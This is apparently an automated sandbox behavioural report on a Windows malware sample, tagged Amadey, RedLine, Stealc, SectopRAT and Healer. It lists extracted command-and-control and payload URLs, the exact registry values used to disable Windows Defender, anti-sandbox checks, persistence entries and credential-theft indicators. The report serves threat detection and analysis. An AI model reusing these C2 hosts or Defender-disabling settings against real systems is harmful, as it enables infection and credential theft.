Analysis
-
max time kernel
117s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
18-02-2025 17:55
Static task
static1
Behavioral task
behavioral1
Sample
dfb3dd74837e1f931c4456bd18eb5a8d.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
dfb3dd74837e1f931c4456bd18eb5a8d.exe
Resource
win10v2004-20250217-en
General
-
Target
dfb3dd74837e1f931c4456bd18eb5a8d.exe
-
Size
2.0MB
-
MD5
dfb3dd74837e1f931c4456bd18eb5a8d
-
SHA1
51dd5849ef9ca1779d755ba5596691ea9a539bab
-
SHA256
e7824fff5b683ad4df57bdc846e3763a507b76c3bfb369325f6ee117f6bf23f0
-
SHA512
23e32188f617c067bec46d00c4be97af76253a2962be1defb7c17d074d0fb4c98865f2fcf8f78ece729d30996f64fe3414610c2d5dcc5dcc1f48f4ce765dd550
-
SSDEEP
49152:mT6dCGskIPZMTwxw1j5Qb2MBPeIKQIcF3E1Wu4T1u:u6dCWVwxkj2bF19XlV1
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5152-1014-0x0000000000390000-0x00000000007D2000-memory.dmp healer behavioral2/memory/5152-1015-0x0000000000390000-0x00000000007D2000-memory.dmp healer behavioral2/memory/5152-1275-0x0000000000390000-0x00000000007D2000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/3216-232-0x0000000000670000-0x0000000000AE8000-memory.dmp family_sectoprat behavioral2/memory/3216-233-0x0000000000670000-0x0000000000AE8000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ spoDnGT.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sHN20me.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfb3dd74837e1f931c4456bd18eb5a8d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fe36XBk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 64 1116 powershell.exe 67 1116 powershell.exe 71 1116 powershell.exe 72 1116 powershell.exe 82 1116 powershell.exe 89 1116 powershell.exe 96 1116 powershell.exe 104 1116 powershell.exe 108 1116 powershell.exe 109 1116 powershell.exe 110 1116 powershell.exe 111 1116 powershell.exe 112 1116 powershell.exe 113 1116 powershell.exe 114 1116 powershell.exe 115 1116 powershell.exe 116 1116 powershell.exe 117 1116 powershell.exe 118 1116 powershell.exe 119 1116 powershell.exe 121 1116 powershell.exe 122 1116 powershell.exe 123 1116 powershell.exe 124 1116 powershell.exe 125 1116 powershell.exe 126 1116 powershell.exe 127 1116 powershell.exe 128 1116 powershell.exe 142 1116 powershell.exe 146 1116 powershell.exe 147 1116 powershell.exe 148 1116 powershell.exe 149 1116 powershell.exe 152 1116 powershell.exe 153 1116 powershell.exe 156 1116 powershell.exe 159 1116 powershell.exe 166 1116 powershell.exe 168 1116 powershell.exe 169 1116 powershell.exe 170 1116 powershell.exe 171 1116 powershell.exe 175 1116 powershell.exe 177 1116 powershell.exe 178 1116 powershell.exe 179 1116 powershell.exe 190 1116 powershell.exe 191 1116 powershell.exe 192 1116 powershell.exe 193 1116 powershell.exe 194 1116 powershell.exe 198 1116 powershell.exe 200 1116 powershell.exe 204 1116 powershell.exe 205 1116 powershell.exe 206 1116 powershell.exe 208 1116 powershell.exe 209 1116 powershell.exe 211 1116 powershell.exe 217 1116 powershell.exe 218 1116 powershell.exe 221 1116 powershell.exe 224 1116 powershell.exe 230 1116 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
pid Process 3492 powershell.exe 856 powershell.exe 3948 powershell.exe 5504 powershell.exe 5888 powershell.exe 5732 powershell.exe 4156 powershell.exe 5400 powershell.exe 5640 powershell.exe -
Downloads MZ/PE file 25 IoCs
flow pid Process 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 14 3352 skotes.exe 299 3352 skotes.exe 363 5808 futors.exe 363 5808 futors.exe 363 5808 futors.exe 308 856 powershell.exe 345 3948 powershell.exe 259 3352 skotes.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5752 msedge.exe 2052 chrome.exe 336 chrome.exe 2248 chrome.exe 4720 chrome.exe 3368 msedge.exe 6012 msedge.exe 1672 msedge.exe 5740 msedge.exe -
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfb3dd74837e1f931c4456bd18eb5a8d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfb3dd74837e1f931c4456bd18eb5a8d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation dfb3dd74837e1f931c4456bd18eb5a8d.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation Setup_2024.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 39 IoCs
pid Process 3352 skotes.exe 2260 8bb20e8213.exe 1516 8bb20e8213.exe 1444 13Z5sqy.exe 1440 jonbDes.exe 4772 Bjkm5hE.exe 4272 Bjkm5hE.exe 4028 Fe36XBk.exe 5064 skotes.exe 3216 ViGgA8C.exe 3348 DTQCxXZ.exe 4448 TaVOM7x.exe 4016 d2YQIJa.exe 2624 sHN20me.exe 2988 spoDnGT.exe 4908 Ta3ZyUR.exe 688 Ta3ZyUR.exe 2272 qFqSpAp.exe 4664 m5UP2Yj.exe 1056 jROrnzx.exe 392 jROrnzx.exe 2728 7aencsM.exe 5076 7aencsM.exe 2116 skotes.exe 1288 Setup_2024.exe 3348 setup.exe 4076 97509cc0ad.exe 5152 Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE 5596 amnew.exe 5808 futors.exe 752 Bjkm5hE.exe 4712 Bjkm5hE.exe 4048 Bjkm5hE.exe 336 Bjkm5hE.exe 2064 483d2fa8a0d53818306efeb32d3.exe 4080 Ta3ZyUR.exe 1288 Ta3ZyUR.exe 4536 7aencsM.exe 1448 7aencsM.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine dfb3dd74837e1f931c4456bd18eb5a8d.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine sHN20me.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine Fe36XBk.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine ViGgA8C.exe Key opened \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Software\Wine spoDnGT.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\97509cc0ad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085971101\\97509cc0ad.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085972021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Fe36XBk.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0006000000022b08-952.dat autoit_exe behavioral2/files/0x000a00000001e727-1750.dat autoit_exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid Process 3584 dfb3dd74837e1f931c4456bd18eb5a8d.exe 3352 skotes.exe 4028 Fe36XBk.exe 5064 skotes.exe 3216 ViGgA8C.exe 4016 d2YQIJa.exe 2624 sHN20me.exe 2988 spoDnGT.exe 4664 m5UP2Yj.exe 2116 skotes.exe 5152 Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE 2064 483d2fa8a0d53818306efeb32d3.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 2260 set thread context of 1516 2260 8bb20e8213.exe 88 PID 4772 set thread context of 4272 4772 Bjkm5hE.exe 96 PID 1444 set thread context of 4704 1444 13Z5sqy.exe 113 PID 4908 set thread context of 688 4908 Ta3ZyUR.exe 119 PID 4448 set thread context of 4736 4448 TaVOM7x.exe 123 PID 1056 set thread context of 392 1056 jROrnzx.exe 127 PID 2728 set thread context of 5076 2728 7aencsM.exe 131 PID 752 set thread context of 336 752 Bjkm5hE.exe 190 PID 4080 set thread context of 1288 4080 Ta3ZyUR.exe 201 PID 4536 set thread context of 1448 4536 7aencsM.exe 210 -
resource yara_rule behavioral2/memory/4800-1449-0x00007FFE7C590000-0x00007FFE7CB79000-memory.dmp upx behavioral2/memory/4800-1456-0x00007FFE95600000-0x00007FFE9560F000-memory.dmp upx behavioral2/memory/4800-1455-0x00007FFE95550000-0x00007FFE95573000-memory.dmp upx behavioral2/memory/4800-1459-0x00007FFE915D0000-0x00007FFE915E9000-memory.dmp upx behavioral2/memory/4800-1458-0x00007FFE91EA0000-0x00007FFE91EAD000-memory.dmp upx behavioral2/memory/4800-1460-0x00007FFE900E0000-0x00007FFE9010D000-memory.dmp upx behavioral2/memory/4800-1457-0x00007FFE91EB0000-0x00007FFE91EC9000-memory.dmp upx behavioral2/memory/4800-1461-0x00007FFE90010000-0x00007FFE90046000-memory.dmp upx behavioral2/memory/4800-1462-0x00007FFE90000000-0x00007FFE9000D000-memory.dmp upx behavioral2/memory/4800-1463-0x00007FFE8FFC0000-0x00007FFE8FFF3000-memory.dmp upx behavioral2/memory/4800-1464-0x00007FFE8BCF0000-0x00007FFE8BDBD000-memory.dmp upx behavioral2/memory/4800-1467-0x00007FFE7C070000-0x00007FFE7C590000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\Office 2024 Installer\Click To Run.bat Setup_2024.exe File created C:\Program Files (x86)\Office 2024 Installer\configuration.xml Setup_2024.exe File created C:\Program Files (x86)\Office 2024 Installer\setup.exe Setup_2024.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job dfb3dd74837e1f931c4456bd18eb5a8d.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023d6c-1313.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 13 IoCs
pid pid_target Process procid_target 3672 2260 WerFault.exe 86 976 4772 WerFault.exe 95 3224 4908 WerFault.exe 118 2916 1056 WerFault.exe 125 1856 2728 WerFault.exe 130 2988 4664 WerFault.exe 124 4720 752 WerFault.exe 185 5564 4080 WerFault.exe 200 1612 4536 WerFault.exe 209 6120 5344 WerFault.exe 217 5612 548 WerFault.exe 223 1928 5204 WerFault.exe 233 5760 3368 WerFault.exe 242 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp3MNKMHYN4YFRSPCZ9REAKNYKAZPJRFHD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TaVOM7x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup_2024.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfb3dd74837e1f931c4456bd18eb5a8d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoDnGT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 97509cc0ad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sHN20me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViGgA8C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fe36XBk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8bb20e8213.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8bb20e8213.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2524 timeout.exe 5128 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
